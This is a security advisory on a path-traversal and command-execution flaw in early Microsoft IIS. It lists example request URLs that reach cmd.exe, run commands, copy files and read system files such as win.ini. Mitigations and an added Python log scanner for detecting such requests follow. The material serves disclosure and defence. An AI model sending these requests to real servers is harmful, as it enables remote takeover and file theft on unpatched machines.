----------------------------------------------------------------------------

Service

http

Program

Microsoft Internet-Information-Server/1.0 prior to service pack 3

Problem

The server allows remote users to execute arbitrary programs and retrieve
files outside of the document tree.

Impact

Internet users can take control of the machine.

Timeliness

A series of bugs and vulnerabilities became widely known on 28th February
1996.

Description

It is possible to retrieve files and execute commands outside of the
intended wwwroot tree by including '..' in the document pathnames. In the
following example URLs, a directory tree is envisaged where IIS is installed
in c:\inetsrv, and NT is installed in c:\winnt35:

http://your.host.name/scripts/anyold.cmd?&dir+c:\
http://your.host.name/scripts/anyold.bat?&dir+c:\
http://your.host.name/..\..\autoexec.bat
http://your.host.name/scripts/../../../winnt35/win.ini
http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+set
http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+echo+"Hi There"+>c:\temp\hello.txt
http://your.host.name/scripts/..\..\WINNT35\SYSTEM32\XCOPY.EXE?+c:\autoexec.bat+c:\temp

Recommendations

   * Obtain & install Service Pack 3.
   * Put the wwwroot and scripts on separate partitions.
   * Disable file mappings for .bat and .cmd.

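For reviewing server logs, the request shapes listed under Description can be
recognised mechanically. The following is an added example, not part of the
original advisory: it flags request targets whose '..' segments climb above
the document root (treating '\' like '/' and decoding percent-escapes once,
which goes slightly beyond the literal URLs shown) and requests for .bat/.cmd
files. The log line layout, function names and finding labels are assumptions.

```python
from urllib.parse import unquote

BATCH_EXTS = (".bat", ".cmd")  # the mappings the advisory says to disable

def inspect_request(target):
    """Return findings for one request target (path plus optional query)."""
    path = target.partition("?")[0]
    # Decode %xx once and treat '\' as a separator, as the NT server does.
    path = unquote(path).replace("\\", "/")
    findings = []
    depth = 0  # directory levels below the document root
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:  # climbed above the root at some point
                findings.append("traversal")
                break
        else:
            depth += 1
    if path.lower().endswith(BATCH_EXTS):
        findings.append("batch-script")
    return findings

def scan(lines):
    """Yield (target, findings) for each flagged 'METHOD target VERSION' line."""
    flagged = []
    for line in lines:
        parts = line.split(" ")
        if len(parts) < 2:
            continue  # not a request line
        findings = inspect_request(parts[1])
        if findings:
            flagged.append((parts[1], findings))
    return flagged

# Constructed sample request lines built from the URL shapes in the advisory.
SAMPLE_LOG = [
    r"GET /default.htm HTTP/1.0",
    r"GET /docs/../index.htm HTTP/1.0",
    r"GET /scripts/anyold.cmd?&dir+c:\ HTTP/1.0",
    r"GET /scripts/..\..\winnt35\cmd.exe?%2FC+set HTTP/1.0",
    r"GET /scripts/../../../winnt35/win.ini HTTP/1.0",
]

if __name__ == "__main__":
    for target, findings in scan(SAMPLE_LOG):
        print(",".join(findings), target)
```

A '..' that stays inside the document root (such as /docs/../index.htm) is
not flagged; only paths that resolve above the root are reported as traversal.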
